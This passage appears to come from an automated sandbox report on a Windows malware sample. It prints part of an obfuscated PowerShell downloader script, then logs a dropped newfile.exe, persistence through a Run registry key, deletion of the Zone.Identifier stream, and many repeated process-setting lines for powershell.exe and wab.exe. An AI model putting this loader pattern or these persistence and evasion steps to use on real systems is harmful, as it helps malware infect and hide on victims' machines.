SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: newfile.exe.10.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
            Source: newfile.exe.10.drStatic PE information: section name: .didat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34897967 push ebx; retf 2_2_00007FFD3489796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348909A2 push E85E535Dh; ret 2_2_00007FFD348909F9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F645F7 push ss; retn 0007h5_2_04F64602
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F64529 push es; retn 0007h5_2_04F64552
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F66998 push eax; retn 0007h5_2_04F669A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07DD0638 push eax; mov dword ptr [esp], ecx5_2_07DD0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07DD0AB8 push eax; mov dword ptr [esp], ecx5_2_07DD0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07DDE8C0 pushfd ; ret 5_2_07DDEDA3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09650D13 push edx; iretd 5_2_09650D14
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09651CF8 pushfd ; ret 5_2_09651CF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0965134D pushfd ; iretd 5_2_0965135A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09650E72 pushfd ; retf 5_2_09650E89
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09654AE0 push ds; retf 5_2_09654B10
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09650EF9 push cs; retf 5_2_09650F0A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09650AA1 push ecx; ret 5_2_09650AA3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04061CF8 pushfd ; ret 10_2_04061CF9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04060D13 push edx; iretd 10_2_04060D14
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04060E72 pushfd ; retf 10_2_04060E89
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04060AA1 push ecx; ret 10_2_04060AA3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04064AE0 push ds; retf 10_2_04064B10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04060EF9 push cs; retf 10_2_04060F0A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0406134D pushfd ; iretd 10_2_0406135A
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_003813F8 pushfd ; retf 12_2_003813F9
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 12_2_0038376D push ecx; ret 12_2_00383780
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\newfile\newfile.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfileJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfileJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
